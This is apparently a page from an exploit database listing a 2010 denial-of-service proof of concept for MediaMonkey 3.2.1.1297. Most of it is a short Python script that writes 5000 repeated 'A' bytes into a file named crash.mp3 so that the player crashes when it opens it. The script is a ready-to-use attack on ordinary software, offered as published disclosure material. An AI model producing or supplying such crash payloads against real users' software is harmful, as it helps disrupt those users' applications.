Lucene search

K
exploitpackAnonymousEXPLOITPACK:72841BCF0EC209A81DD61FCB1E1B57C0
HistoryAug 05, 2010 - 12:00 a.m.

MediaMonkey 3.2.1.1297 - Denial of Service (PoC)

2010-08-0500:00:00
anonymous
13

MediaMonkey 3.2.1.1297 - Denial of Service (PoC)

#Mediamonkey v. 3.2.1.1297 DOS POC
#vulnerble application link http://www.mediamonkey.com/trialpay
#tested on XP SP2/3

#!/usr/bin/python

filename = "crash.mp3"


junk = "\x41" * 5000

textfile = open(filename , 'w')
textfile.write(junk)
textfile.close()